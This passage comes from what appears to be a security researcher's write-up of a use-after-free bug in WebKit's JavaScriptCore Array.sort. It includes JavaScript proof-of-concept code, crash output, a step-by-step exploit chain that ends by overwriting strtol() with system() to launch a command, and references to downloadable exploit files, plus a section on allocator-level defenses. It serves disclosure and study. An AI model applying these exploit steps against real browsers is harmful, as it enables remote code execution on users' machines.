This is an exceptionally reliable primitive -- likely deterministic, because no allocator churn is involved. This is more of a use-after-invalidation than a use-after-free because nothing is actually freed. No out-of-bounds access relative to a heap chunk occurs either.

Finally, we should note that this primitive isn’t just a use-after-invalidation read, it’s also a use-after-invalidation write because if the sort changes the ordering of the elements, the JSC::ArrayStorage object will be corrupted. There are a large number of possibilities here that remain unexplored.

Situation #3: invalidated write pointer leading to use-after-free write

buf = null;
var myCompFunc = function(x, y) {
  if (!buf) {
    a1[2] = 0x41;               // expand the Array, forcing a reallocation
    buf = new ArrayBuffer(56);  // a 56 byte buffer lands in the freed slot
  }
  return 0;
}

a1 = [1, 2];
a1[0] = a1;
a1[1] = a1;
a1.sort(myCompFunc);
u32buf = new Uint32Array(buf);
alert(u32buf[1]);                // m_numValuesInVector: 2
alert(u32buf[10].toString(16));  // low half of an element's object pointer
alert(u32buf[11].toString(16));  // high half of the same pointer

If we run this on 64-bit, our alerts will come out something like: 2; 9c04c290; 7fbd.

The situation we cause here is simple but powerful. First, a dense 2 element Array is created. This is a 40 byte header plus 2x 8 byte elements on 64-bit, for a total of a 56 byte allocation. During the sort JavaScript callback, the Array is expanded such that it no longer fits inside the 56 byte allocation. A new allocation is made, the current contents are copied, and the old allocation is freed. The vulnerability is that the storage pointer cached at [1] in the C++ code becomes invalid, and using it at [12] and [13] is a use-after-free write.

What will the use-after-free trample over? Because of the bucketing and LIFO nature of the allocator, the attacker gets to choose the object that occupies the recently freed slot simply by causing an allocation of the same size. In the JavaScript above, we just allocate a 56 byte ArrayBuffer backing buffer. As luck would have it, ArrayBuffer backing buffers are also allocated with fastMalloc() so we’re set. The use-after-free tramples over our nice pristine zero filled buffer. The number of elements in the sorted Array is written, which is the value 2 as seen in the alerts. The Array elements are also written, which we have chosen to be JavaScript objects in this case. That gives us another useful information leak, telling us where in virtual memory any JavaScript object resides.

As in most of these situations, there remain many unexplored avenues in the tree of possibilities:

  • The use-after-free isn’t just a write primitive. It can also be a read primitive. By allocating any object in the freed slot, the in-progress sort will start reading elements from there instead. This makes for a fairly arbitrary information leak.
  • The use-after-free write was only used here to corrupt an object which is “harmless” to corrupt, i.e. there will be no side effects from corrupting an ArrayBuffer buffer other than leaking information. We could instead explore the side effects accessible from corrupting any other 56 byte (or arbitrary size) object. As an example of a concrete question we could ask: what is the side effect of corrupting each and every possible 56 byte fastMalloc() allocated object, such that the 4 bytes at offset 4 are set to the value “2” (or any other small integer)?

Situation #4: invalidated pointer to map leading to use-after-free read leading to arbitrary free

buf = null;
var myCompFunc = function(x, y) {
  if (!buf) {
    a1[2] = 0x41;
    buf = new ArrayBuffer(56);
    u32buf = new Uint32Array(buf);
    u32buf[2] = 0x41414141;  // offset 8: overlaps m_sparseValueMap
  }
  return 0;
}

a1 = [1, 2];
a1.sort(myCompFunc);

On 64-bit, this leads to:

Program received signal SIGSEGV
JSC::JSArray::sort (...)
mov 0x10(%rax),%edx
$rax = 0x41414141

As you will appreciate, that’s pretty serious looking. And such a simple JavaScript file. What happened? This is in fact a pretty similar use-after-free to situation #3. It starts off identically, object sizes and all. However, instead of creating and leaving a zero filled ArrayBuffer buffer in the freed slot, we set a few of the zeros to the byte value 0x41, at offset 8. Offset 8 corresponds to the object member JSC::ArrayStorage::m_sparseValueMap. This member is loaded through a stale storage pointer at [5] in the C++ code. This is a use-after-free read with bad pointer dereference as the immediate side effect. The crash occurred trying to load map->size(), with map being a nonsense pointer value of 0x41414141. If we had used a valid pointer value instead, we’d maybe iterate over some map keys and then call delete on whatever the valid pointer was, at [10]. The ability to free arbitrary pointers is pretty powerful and could lead to tertiary side effects such as use-after-free like situations of more arbitrary object types.

The reliability of this attack is very high. It’s almost deterministic, because the allocator behavior for handing out memory chunks is deterministic, and the attacker controls the exact order of allocations and frees from JavaScript. However, for completeness, we should note that we haven’t fully analyzed the situation with regard to threading and timers. These are questions we would need to answer if trying to make a truly 100% reliable exploit:

  • What happens if a timer fires right in between the free and the allocation for the use-after-free? Are there situations where running JavaScript can get pre-empted in this critical spot? What is the process, threading and pre-emption model when multiple different tabs, windows and websites are running in the same browser?
  • What about threads? Although the allocator has a per-thread cache, what if the free happens to release the last object held in a page range, and another thread triggers page reclaim right at this inopportune time?

Proceeding with exploitation: 64-bit

Now that we’ve enumerated various different use-after-invalidation possibilities, it’s time to consider chaining some of them together to try and get a reliable exploit working. We will start with 64-bit just because.

The number of different side effects we have to play with, as partially enumerated above, is large and possibly even a little overwhelming. If we consider secondary and tertiary etc. side effects that are possible, we’re into a blossoming tree of weird machine explorations! As always, though, one key to reliable exploitation is to try and keep things as simple as possible. So we’re going to try and rewire objects to get to a stage where we can cleanly read and write arbitrary locations in the virtual address space. The typical way of doing this is to gain control of a Uint8Array object or Uint32Array, etc.

After a bit of consideration, we’re going to do this by:

  1. Using our information leak primitive to learn where a buffer of a given size is.
  2. Use our arbitrary free primitive on that buffer of the given size.
  3. Immediately allocate a new object of the given size, to go into the freed slot.
  4. If necessary, repeat 2 and 3 one more time, to locate two arbitrary types of object at the same address.
  5. Now, we have a nice aliasing situation where live pointers exist to two different object types.

By chaining together the primitives we already have, we’ve gained a new powerful primitive: arbitrary object aliasing!

But before we can get all excited and use this primitive, we need to resolve an important issue: going back to primitive #2 above, the ability to leak the address of an ArrayStorage object, we see that it crashed on 64-bits :( Why is this? The answer is in the way JavaScriptCore internally represents JavaScript values. They are 8 byte values on both 32-bit and 64-bit, and can variously represent JavaScript numbers (doubles), boolean values, undefined values, null values and also arbitrary JavaScript objects. The way these different types are encoded differs between 32-bit and 64-bit, hence the difference in behavior. Of interest is when an 8 byte value is considered a JavaScript object -- termed a cell -- instead of a simple type like a number. Extracted and summarized from JSValueInlineMethods.h:

#if USE(JSVALUE32_64)
// (This is the 32-bit case.)
inline bool JSValue::isCell() const
{
    return tag() == CellTag;
}
#else
// (This is the 64-bit case.)
inline bool JSValue::isCell() const
{
    return !(u.asInt64 & TagMask);
}
#endif
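The 64-bit check can be modelled with BigInt arithmetic; the sample bit patterns below are illustrative values of my own, not captures from a real heap:

```javascript
// Model of the 64-bit JSValue::isCell() test: a value is a cell (object
// pointer) if and only if no bits of TagMask are set.
var TagMask = 0xffff000000000002n;
function isCell(bits) { return (bits & TagMask) === 0n; }

console.log(isCell(0x00007fbd9c04c290n));  // true: shaped like a heap pointer
console.log(isCell(0xffff000000000007n));  // false: a tagged 32-bit integer
console.log(isCell(0x4009000000000000n));  // false: an encoded double
```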

Where tag() returns the upper 4 bytes of the value, CellTag == 0xfffffffb and TagMask == 0xffff000000000002. Decoding all of this, the format of a cell pointer on 32-bit will be the actual 32-bit cell pointer followed by 0xfffffffb. On 64-bit, it will simply be the actual raw pointer itself (the tag mask selects for x86_64 style 48-bit pointers, with a partial alignment constraint). Aha! So this means that on 64-bit, as we’re trying to use and leak our real pointer to the ArrayStorage object, it will get interpreted as a JavaScript cell pointer, and obviously that is not going to end well. On 32-bit, any pointer value we want to leak will work fine unless it is followed in memory by the 4 byte value 0xfffffffb. Looking at the full ArrayStorage structure:

  struct ArrayStorage {
      unsigned m_length; // The "length" property on the array
      unsigned m_numValuesInVector;
      SparseArrayValueMap* m_sparseValueMap;
      void* subclassData; // A JSArray subclass can use this to fill the vector
      void* m_allocBase; // Pointer to base address returned by malloc().
                         // Keeping this pointer does eliminate false positives
                         // from the leak detector.
      size_t reportedMapCapacity;
      WriteBarrier<Unknown> m_vector[1]; // Variable-length element storage follows.
  };

The pointer we leak is m_allocBase, and it is 8-byte aligned and followed by the reportedMapCapacity member, which is unlikely to ever be set to 0xfffffffb, even if we tried. So for 32-bit, we will always treat the leaked pointer as the first 4 bytes of a double value, which can be cleanly converted to raw bytes, as best I know. Although, interested readers should read Natalie Silvanovich’s Project Zero post where she had trials and tribulations with floating point SNaN quirks.
But on 64-bit, we really want to leak a real pointer value. It’s a headache that attempting the leak creates a JavaScript reference that causes a crash when used. In order to solve this issue, we can actually resort to combining situation #2 and situation #3 above. The full sequence is:

  1. Create an Array and sort it.
  2. On the first sort JavaScript callback, splice the Array so that the sort iteration will treat the ArrayStorage header fields as elements within the Array to sort.
  3. Under no circumstances use either of the JavaScript references passed to the sort callback, because the references based on the raw pointers in the ArrayStorage header will explode if touched in any way.
  4. On the final sort JavaScript callback, expand the Array, causing a reallocation and then use the resulting use-after-free to write the sorted Array elements into a freshly allocated ArrayBuffer buffer.
  5. The sorted elements will include the raw pointers from the ArrayStorage headers and these can now be safely read from the ArrayBuffer buffer that was written to on account of the use-after-free.

Ok. Now that we’ve fixed our information leak primitive on 64-bit, our object aliasing primitive that depends on it will now work. Let’s describe the full exploitation sequence:

  1. Alias a 112 byte ArrayBuffer buffer with a 112 byte WebCore::ScriptRunner object (which is allocated in the fastMalloc() heap when you create a new document from JavaScript).
  2. Read a timer related function pointer value from the WebCore::ScriptRunner. This gives us the address of everything in the library containing WebCore, and hence the location of its BSS section.
  3. Alias a 2088 byte ArrayBuffer buffer with a 2088 byte ArrayStorage with 256 elements.
  4. Writing through the ArrayBuffer buffer, set element[0] to be an object pointer. Point it at element[1] in the Array, which is a memory scratch space we will use to fake a JSUint8Array object.
  5. Fake the JSUint8Array object. To be functional, we need to fill in bytes 0-7 (with the vtable for JSUint8Array), and bytes 48-55 (with a pointer to the Uint8Array object). Point this latter pointer to element[8] in the Array, which is a memory scratch space we will use to fake a Uint8Array object.
  6. Fake the Uint8Array object. To be functional, we need to fill in bytes 16-23 to point to the buffer storage we want. We point this to the BSS section. And we need to set bytes 40-43 to the desired buffer length. We max it out at 0xffffffff.
  7. Now we can access array[0] as a Uint8Array that will read and write relative to the BSS!
  8. Read the strtol() function pointer out of the BSS. From that, calculate the system() function pointer, since both are in libc. Write back system() on top of strtol().
  9. Call new Date(‘xcalc;’) and profit… or at least, calculate. The C++ implementation of the JavaScript Date constructor calls strtol() on the string argument, hence the sound of popping calcs.

Obligatory screenshot:


You can download the exploit file here: arrsort_exploit_fake_uint8.html

Proceeding with exploitation: 32-bit

Surprise! Bonus! The very same exploit file actually works on 32-bit. The code acts a bit differently to use different object sizes, object field offsets and deltas. But the steps taken are the same for both the 64-bit and 32-bit cases.

Here’s a different working, reliable 32-bit exploit that I wrote earlier: arrsort_exploit_32bit_alt.html

There are some similarities, but it takes a different path and also achieves reliable code execution. This is perhaps a testament to the quality of the vulnerability. Briefly, this alternate exploit works like this:

  1. Use a simpler way to leak the pointer values from the ArrayStorage header, by directly reading double values in the sort callback. These double values are converted to raw bytes using the JavaScript DataView object.
  2. Use the aliasing primitive previously described to alias a Uint8Array buffer with an ArrayStorage object.
  3. Add some sparse keys to the aliased ArrayStorage object, causing the allocation of the m_sparseValueMap pointer, pointing to a 20 byte HashMap object.
  4. Read the m_sparseValueMap pointer and use the previously described freeing primitive to free it.
  5. Allocate a 24 byte Uint32Array backing buffer. The 24 byte backing buffer goes in the hole we just freed.
  6. Free the same address again, freeing the Uint32Array backing buffer.
  7. Allocate another 4 byte Uint32Array. The 24 byte Uint32Array metadata object will go into the hole we just freed.
  8. We have now aliased a Uint32Array backing buffer with a Uint32Array metadata object. Proceeding from here is simple because we can read the Uint32Array vtable and also change the backing buffer pointer and length to read / write arbitrary memory.

The main quirk here enabling this alternate and slightly simpler exploit on 32-bit is the observation that on 32-bit, sizeof(WTF::HashMap) == 20 and sizeof(WebCore::Uint32Array) == 24. Due to the 8 byte granularity of small fastMalloc() buckets, these two different objects occupy the same heap bucket size of 24.
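The shared size class follows directly from the rounding; as a sketch of the arithmetic (not fastMalloc's actual size class code):

```javascript
// With 8 byte bucket granularity, a 20 byte HashMap and a 24 byte
// Uint32Array metadata object land in the same 24 byte size class.
function sizeClass(size) { return Math.ceil(size / 8) * 8; }
console.log(sizeClass(20), sizeClass(24));  // 24 24
```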

Browser defenses

The astute reader will note that any use-after-free in WebKit might be subject to the same exploitation technique in JavaScript: allocate a Uint32Array backing buffer into the freed hole and then enjoy a wide variety of side effects. This is definitely a concern! And it also illustrates the power and possibilities of the use-after-free vulnerability class. Using this technique, the attacker gets to choose arbitrary bytes for every field in the object that is being used after free. The attacker can pick an arbitrary vtable (call-after-use-after-free), arbitrary flags / arbitrary length (read-after-use-after-free), fake arbitrary object pointers (call or read or write-after-use-after-free), etc. If the code paths available to the attacker include write-after-use-after-free, the attacker might well be able to access information leaks, or perform precision corruption of other similarly sized object types.

Perhaps this primitive is too powerful to leave unmitigated? It is. So, some time ago, I broke this primitive in Google Chrome, by placing ArrayBuffer backing buffers into their own heap partition. This should ensure that when a use-after-free vulnerability triggers, it is not possible to place an ArrayBuffer backing buffer into the freed hole. There are other object types that might offer similar attacker control of content (strings, etc.) and various related changes also applied partitioning to these and other objects. The goal is that with the partitioning present in Google Chrome, the attacker has less control over the aliased bytes used by code after a use-after-free condition.

It might also be tempting to declare war on allocator determinism. After all, it makes things simple if the most recently freed chunk is the first to be handed out. And indeed there are various schemes popping up to reduce freelist determinism, such as freelist randomization in the Linux kernel. I’m not actually a fan of these schemes for most exploitation contexts. If the attacker is running some form of “script”, such as JavaScript in a browser, or a user space program on Linux, they can just allocate multiple objects to achieve the same desired effect.
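A toy model of my own shows why: against a randomized free list, an attacker who can allocate repeatedly simply drains the list and ends up owning the interesting hole anyway:

```javascript
// Randomized free list: each allocation takes a random free slot. The
// attacker allocates until the list is empty, guaranteeing the target slot.
var freeList = [0x111, 0x222, 0x333, 0x444, 0x555];  // 0x333 is the hole we want
function allocRandom() {
  var i = Math.floor(Math.random() * freeList.length);
  return freeList.splice(i, 1)[0];
}
var owned = [];
while (freeList.length)
  owned.push(allocRandom());
console.log(owned.indexOf(0x333) >= 0);  // true: spraying defeats randomization
```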


Conclusions

I think that use-after-invalidation and use-after-free are wonderful and maybe underappreciated vulnerability classes. Perhaps after reading this post, you concur? We selected a suitably interesting and powerful vulnerability and demonstrated a large range of reliable, controllable and powerful side effects.